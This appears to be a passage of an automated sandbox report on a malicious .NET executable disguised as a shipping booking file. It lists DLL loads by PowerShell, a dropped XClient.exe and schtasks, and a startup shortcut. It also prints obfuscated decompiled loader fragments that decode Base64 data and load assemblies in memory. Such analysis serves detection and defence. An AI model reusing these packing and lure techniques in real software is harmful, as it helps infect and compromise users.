Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\XClient.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: XClient.lnk.10.dr

LNK file: ..\..\..\..\..\..\Local\XClient.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.sbktxjFwkFkhFsjrvspdYOD22he4M34sievnaWNyBCQnbd99km38od,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.VpqE6qu5NBFVe1zKtqqYKa4xj7pX4LpVFFJgvtRtolV8dajKFze95c,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.OT62GEi9AYDMy21VeJYWlGUcstKt4Y5QIAGq49kqQAYL0CT6se8Sar,Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.T3Idj3F2oDeFMsad6egEQRL3y9cedieeV5mm9bZlTTGdzNhQhbYPV9,UZUv4Eo6zQhbxPiCqZPo3OnZwa02.XqczzdES8LwwFq4wGxNFUpvyopni()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2],UZUv4Eo6zQhbxPiCqZPo3OnZwa02.mvlATZvtOhScDB0n3yloDYdLenXf(Convert.FromBase64String(rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rlP0Eq7eKfKCRKmpbchw9xOwao86BCQNlLG1LHqiDo2mSrzf9Vrp0kATNNtjO4LmAUF8gZ3ZCquklaz7Wrq7xF[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.5810000.6.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.5810000.6.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	.Net Code: OOhr3a1YQb System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227
